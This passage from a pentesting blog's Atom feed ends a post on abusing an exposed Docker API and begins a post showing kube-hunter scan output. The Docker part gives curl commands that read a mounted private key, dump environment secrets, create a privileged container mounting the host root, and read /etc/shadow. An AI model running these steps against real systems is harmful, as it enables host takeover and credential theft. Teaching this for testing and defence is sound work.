#444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cb\u003Etmpfs on \/run\/secrets\/registry-cert.crt type tmpfs (ro,relatime)\u003C\/b\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cb\u003Etmpfs on \/run\/secrets\/htpasswd type tmpfs (ro,relatime)\u003C\/b\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cb\u003Etmpfs on \/run\/secrets\/registry-key.key type tmpfs (ro,relatime)\u003C\/b\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E---SNIP---\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003ECat the mounted secret\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/containers\/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439\/exec -d '{ \"AttachStdin\": false, \"AttachStdout\": true, \"AttachStderr\": true, \"Cmd\": [\"\/bin\/sh\", \"-c\", \"cat \/run\/secrets\/registry-key.key\"]}'\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;{\"Id\":\"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30\"}\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;curl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/exec\/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30\/start -d '{}'\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;-----BEGIN RSA PRIVATE KEY-----\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003EMIIJKAIBAAKCAgEA1A\/ptrezfxUlupPgKd\/kAki4UlKSfMGVjD6GnJyqS0ySHiz0\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E---SNIP---\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EIf you have secrets, it's also worth checking out services in case they are adding secrets via environment variables\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;curl -s --insecure https:\/\/tls-opendocker.socket:2376\/services | jq\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;[{\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"ID\": \"amxjs243dzmlc8vgukxdsx57y\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Version\": {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"Index\": 6417\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"CreatedAt\": \"2018-04-16T19:51:20.489851317Z\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"UpdatedAt\": \"2018-12-07T13:44:36.6869673Z\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \"Spec\": {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"Name\": \"app_REMOVED\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"Labels\": {},\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"TaskTemplate\": {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"ContainerSpec\": {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"Image\": \"dpage\/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"Env\": [\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"PGADMIN_DEFAULT_EMAIL=REMOVED\u003Cremoved\u003E@gmail.com\",\u003C\/removed\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"PGADMIN_DEFAULT_PASSWORD=REMOVED\"\u003Cremoved\u003E\u003C\/removed\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"Isolation\": \"default\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u0026nbsp;Creating a container that has mounted the host file system\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket2376\/containers\/create?name=test -d '{\"Image\":\"alpine\", \"Cmd\":[\"\/usr\/bin\/tail\", \"-f\", \"1234\", \"\/dev\/null\"], \"\u003Cb\u003EBinds\": [ \"\/:\/mnt\" ]\u003C\/b\u003E, \u003Cb\u003E\"Privileged\": true\u003C\/b\u003E}'\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E{\"Id\":\"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192\",\"Warnings\":null}\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/containers\/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192\/start?name=test\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: inherit; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit; font-size: xx-small;\"\u003ERead something from the host\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/containers\/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192\/exec -d '{ \"AttachStdin\": false, \"AttachStdout\": true, \"AttachStderr\": true, \"Cmd\": [\"\/bin\/sh\", \"-c\", \"cat \/mnt\/etc\/shadow\"]}'\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E{\"Id\":\"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6\"}\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/exec\/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6\/start -d '{}'\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eroot:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edaemon:*:17001:0:99999:7:::\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebin:*:17001:0:99999:7:::\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Esys:*:17001:0:99999:7:::\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Esync:*:17001:0:99999:7:::\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Egames:*:17001:0:99999:7:::\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003ECleanup\u003C\/span\u003E\u003C\/b\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EStop the container\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -vv -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/containers\/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192\/stop\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003Edelete stopped containers\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure -vv -X POST -H \"Content-Type: application\/json\" https:\/\/tls-opendocker.socket:2376\/containers\/prune\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/8436225123281631092\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=8436225123281631092","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8436225123281631092"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8436225123281631092"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/abusing-docker-api-socket.html","title":"Abusing Docker API | Socket"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-1446529168694232824"},"published":{"$t":"2019-01-16T09:00:00.002-05:00"},"updated":{"$t":"2019-01-16T09:00:13.112-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: Kube-Hunter 10255"},"content":{"type":"html","$t":"Below is some sample output that mainly is here to see what open 10255 will give you and look like.\u0026nbsp; What probably of most interest is the \/pods endpoint\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-vNl4SRm4Jlg\/XDN4gXjhftI\/AAAAAAAACZI\/2sA7DjWUTqIVQXt_OHO9dZZUFnixRMSzwCLcBGAs\/s1600\/10255-pods.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cimg border=\"0\" data-original-height=\"620\" data-original-width=\"1600\" height=\"155\" src=\"https:\/\/2.bp.blogspot.com\/-vNl4SRm4Jlg\/XDN4gXjhftI\/AAAAAAAACZI\/2sA7DjWUTqIVQXt_OHO9dZZUFnixRMSzwCLcBGAs\/s400\/10255-pods.png\" width=\"400\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003Eor the \/metrics endpoint\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"font-family: inherit; margin-left: 1em; margin-right: 1em;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-Gs9miGpMw5g\/XDN4qBn6QQI\/AAAAAAAACZM\/nhu1dQXFA1M2tnrfDDZHiQNCAX-Vc4mJwCLcBGAs\/s1600\/10255-metrics.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"442\" data-original-width=\"1600\" height=\"110\" src=\"https:\/\/1.bp.blogspot.com\/-Gs9miGpMw5g\/XDN4qBn6QQI\/AAAAAAAACZM\/nhu1dQXFA1M2tnrfDDZHiQNCAX-Vc4mJwCLcBGAs\/s400\/10255-metrics.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nor the \/stats endpoint\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-vv9m0RNi72c\/XDUBVLsFLjI\/AAAAAAAACZc\/tP31iCmJrZYLUBdoG5aEq2knBKVbXP2fACLcBGAs\/s1600\/10255-stats.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1306\" data-original-width=\"1600\" height=\"326\" src=\"https:\/\/3.bp.blogspot.com\/-vv9m0RNi72c\/XDUBVLsFLjI\/AAAAAAAACZc\/tP31iCmJrZYLUBdoG5aEq2knBKVbXP2fACLcBGAs\/s400\/10255-stats.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: inherit; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\n\n\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E$ .\/kube-hunter.py\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003EChoose one of the options below:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E1. Remote scanning\u0026nbsp; \u0026nbsp; \u0026nbsp; (scans one or more specific IPs or DNS names)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E2. Subnet scanning\u0026nbsp; \u0026nbsp; \u0026nbsp; (scans subnets on all local network interfaces)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E3. IP range scanning\u0026nbsp; \u0026nbsp; (scans a given IP range)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003EYour choice: 1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003ERemotes (separated by a ','): 1.2.3.4\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E~ Started\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E~ Discovering Open Kubernetes Services...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Etcd:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: open service\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;service: Etcd\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; host: 1.2.3.4:2379\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| API Server:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: open service\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;service: API Server\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; host: 1.2.3.4:443\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , 